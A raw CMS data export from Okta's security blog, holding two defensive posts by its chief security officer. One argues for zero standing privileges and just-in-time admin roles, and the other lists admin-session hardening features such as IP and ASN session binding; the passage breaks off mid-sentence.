Engineering","slug":"dan-post","node_locale":"en"},{"id":"180f95d6-983c-585e-ab25-442a52dbff38","bio":{"bio":"Okta Product Security, formerly known as the REX (Research and Exploitation) team."},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3xrOguKhVQ2NoNX2glBxze/397b30dd03c11f0bcdb96671b3010b37/Okta_Aura_CMYK_Black.png"},"name":"Okta Product Security","jobTitle":"The artists formerly known as the REX (Research and Exploitation) team.","slug":"product-security-team","node_locale":"en"}]},{"slug":"caseforzerostandingprivileges","id":"32162a36-ca3e-5d05-9e6f-2a395b976a91","title":"The Case for Zero Standing Privileges ","date":"2024-08-19T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The principle of least privilege is one of the best known laws of information security: and it’s often the most difficult to put into practice. The principle demands that a user should only be given access to the resources and permissions they require to complete their tasks, and no more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When I speak with peer CISOs they routinely state that they don’t have much trouble applying this principle to regular users, but they are still challenged when privileged access comes under scrutiny. Privileged Access Management (PAM) provides the seatbelt that makes it safe to grant privileged roles. Specifically, PAM addresses the risk posed by adversary access to administrator credentials by vaulting the passwords used for access to privileged resources. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"PAM has come a long way: in a former life we actually stored passwords on pieces of paper inside a physical vault! Vaulting software and services allows us to gate access to the credentials used for privileged access, and to require controls like step-up authentication and/or dual authorization before an administrator can “check out” the password. PAM can and should also offer an ability to automatically rotate a password after use by a human administrator.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today’s PAM solutions have served us well when it comes to securing access to privileged on-prem resources like databases and servers. However, they tend to fall short when a privileged resource, such as a non-federated, privileged account in a B2B SaaS app, is accessible via the public internet. The vaulting capability can ensure that only an authenticated and authorized user can check out the credential for that privileged account, but if that password is entered into a SaaS app via an interactive browser session, the PAM solution can do little to protect the password from being saved (inadvertently) in the user browser or intercepted by malware. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past 12 months, we have observed a number of attacks where the vaulting of a password wasn’t sufficient to prevent adversary access to administrative resources.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These risks arise because:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are dealing with an Infostealer epidemic:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" The sheer size of the “combo lists” of stolen credential pairs and session tokens distributed on the internet today is staggering. Most of the enterprise credentials caught up in these dumps were extracted by the personally-owned devices or the devices of temporary contractors - devices that were \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"not\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" subject to endpoint protection controls. Any password submitted via the browser of a malware-compromised device is vulnerable to interception. (You could say that the security teams of today are paying the price for the surge in the use of personally-owned devices that arose during the pandemic).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attackers are targeting native/non-federated/local accounts\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Attackers are wise to the challenge posed by user accounts protected by single sign-on (SSO) and multifactor authentication (MFA). We have observed an increase in the targeting of non-federated accounts that allow direct access to the SaaS application. Authentication policies for non-federated accounts are typically weaker than those federated with an SSO provider. Numerous high-profile attacks involve the same pattern over again: the password or long-lived session token for a privileged account is extracted from an unmanaged device using infostealer malware, and is often sold on or distributed to other attackers.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These risks can be mitigated if:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security teams have tools to discover unexpected local/non-federated paths of access into SaaS applications, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security teams can protect credentials with a cloud-native PAM that can auto-rotate credentials for SaaS applications after they are accessed by a human user.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made it our mission to build the tools that mitigate these risks (see \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/products/privileged-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Privileged Access\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/identity-security-posture-management/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity Security Posture Management\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"). But as with any adversarial contest, “the enemy gets a vote” too: we should not expect their capabilities to stand still. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So every organization also needs to be thinking about how to reduce or limit the blast radius when attackers successfully take over a highly privileged account. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enter (near) zero standing privileges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nZero standing privileges takes the principle of least privileged access to the nth degree. As the words suggest, the idealized state is that a grand total of zero accounts have standing administrative permissions in applications. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I say “idealized” state because most systems are designed to have at least one interactive account with a\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"level of administrative privilege. Resiliency demands the use of a break glass account - a shared account that can be relied on if the accounts assigned to individual human administrators are inaccessible. So if we’re being pragmatic, our North Star should be to reduce standing privileges to “near zero”. The minimum goal should be to have fewer numbers of user and machine accounts with highly privileged roles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You won’t need to look very hard to find opportunities to downscope access. Large-scale studies have demonstrated the extent of the problem of over-privileged access: almost every user and machine account in the cloud is \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/unit42_cloud-threat-report-vol6.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"granted permissions that lie unused [pdf]\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Microsoft’s research shows that \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://learn.microsoft.com/en-us/security/zero-trust/develop/overprivileged-permissions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"less than 10%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of permissions granted to Azure apps are ever used. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There is a role for everyone in the identity ecosystem to play in whittling those permissions down:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cloud service providers have a role to play in helping their most security-conscious customers pare back the privileges that come with standard/out-of-the-box roles. Okta has made progress on the number of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/about-role-permissions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"granular permissions available\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to create custom admin roles, and more are on the way.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers of these services need to use custom admin roles to reduce the number of user and machine accounts with excessive permissions. Customers should also consider the myriad open source tools available for identifying excessive permissions in cloud infrastructure and applications, if not licensed Cloud Infrastructure Entitlement Management (CIEM) solutions.\\n\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Supporting zero standing privileges in the workforce\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nAs part of the Okta Secure Identity Commitment, Okta recently shipped \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/least-privilege-for-your-critical-identity-roles-introducing-govern-okta-admin-roles/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Govern Okta Admin Roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", a license-free add-on for every customer of the Okta platform. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Govern Okta Admin Roles allows for the most privileged administrative roles and permissions \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"in Okta\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to be granted on a just-in-time basis. It’s built using some of the same tools our customers use to govern roles in third party applications (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/products/identity-governance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Governance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to Okta administrative roles can be configured to require dual authorisation, trigger customizable workflows, and be scheduled to expire after a specified time interval. My team recently recorded a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/watch?v=5vEXBdAxBfU&t=816s\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"live demo of this capability\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for the Risky Business podcast if you'd like to learn more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I suggest taking a three-step approach to embracing this new capability:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Study what features your most privileged administrators use frequently. You are more than likely to find that the majority of permissions assigned to any given role are excessive. Work collectively to map out what baseline permissions are required for the roles in your organization.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Substitute standard roles for Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that only include the permissions your administrators require most frequently. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure access request and approval flows for the more privileged and less frequently used permissions, such that they are available on a JIT basis and protected by dual authorization. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Part II of this blog series, we’ll unpack \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/about-role-permissions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"which permissions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in Okta best meet the criteria for JIT access. \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Why privileged users need to embrace Just-In-Time role assignment."},"updatedAt":"2025-02-10T00:13:13.630Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/protectingadminsessions","id":"2e1f659a-b9fd-5dea-9e0f-0590e90a187c","title":"Protecting Administrative Sessions in Okta","date":"2024-03-21T08:13:16+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Privileged users have always been and should always expect to be under constant attack from motivated adversaries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the last 90 days, Okta has devoted many of our most skilled resources into a program of work that dramatically hardens the Okta Admin Console, resulting in a number of new features, a subset of which are listed below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Feature\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Availability\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/apply-ip-or-asn-binding-to-admin-console?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ASN Session Binding\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta automatically revokes an administrative session if the ASN (Autonomous System Number) observed during an API or web request differs from the ASN recorded when the session was established.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"GA, on by default in Okta Admin Console from October 23, 2023\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/apply-ip-or-asn-binding-to-admin-console?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP Session Binding\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer administrators can automatically revoke an administrative session if the IP address observed during an API or web request differs from the IP address recorded when the session was established.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"EA in Okta Admin Console from February 7, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"EA in Okta Workflows Admin, Okta Access Requests and Okta Privileged Access (OPA) in March 1, 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/admin-session-lifetime-idle-timeout-security-enhancements?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Default Maximum and Idle Session Duration \",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Default session timeouts in Okta Admin apps have been set to a 12-hour session lifetime and a 15-minute idle time.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"GA from January 8, 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta admins are prompted for re-authentication when they perform critical tasks in the Admin Console.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"EA in Okta Admin Console from February 7, 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/deliver-zero-standing-privileges-for-okta-admin-roles-governance-for-okta-admin-roles?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Govern Okta Admin Roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers can govern Okta Admin Roles via time-bound access requests and automated access reviews\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Gradual rollout in Okta Admin Console begins April 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/okta-will-require-multi-factor-authentication-mfa-to-access-the-okta-admin-console?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require MFA for access to Admin Console\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta will prevent administrators from creating authentication policies that only require a single factor.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"EA in Okta Admin Console from May 2024.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The purpose of this blog post is to zoom out and think holistically about how to use these features to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce the attack surface of your Okta org,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevent account takeovers, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Limit the blast radius of a stolen session\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reducing the Attack Surface\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The first step to preventing unauthorized access to privileged applications is to reduce the number of accounts with privileged roles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s standard administrative roles offer the fastest path to value for new workforce deployments. Over time, the most security conscious organizations migrate to Custom Admin Roles in pursuit of least privilege access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This journey starts with:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assigning administrative permissions by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/users-groups-profiles/usgp-groups-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Group\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and avoiding assigning them individually. This greatly simplifies the administration and governance of policies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identifying tactical ways to minimize the number of accounts with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/administrators-admin-comparison.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"highly privileged roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (Super Administrators, Org Administrators, App Administrators). \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/automation-hooks/delegated-flows/about-delegated-flows.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Delegated Flows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", for example, offers opportunities to reduce the number of Workflows users that require administrative access.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Breaking down common administrative functions (such as assigning users to apps, or factor lifecycle operations) into \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and assigning them to specific resources (groups, apps, workflows etc), to further promote least privilege.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The target state is to move as close as possible to “zero standing privileges”.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Zero standing privileges is a model in which an administrator gets access to the resources and permissions they require on a just-in-time basis to complete a specified task, after which time the access is automatically revoked.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/privileged-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Privileged Access Management (OPA)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" uses this principle to secure access to servers, databases, apps and other targets. When OPA is combined with the Access Requests feature in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/identity-governance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Governance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (OIG), organizations can be confident that all access to privileged resources is authorized, ephemeral (temporary), and recorded for easy 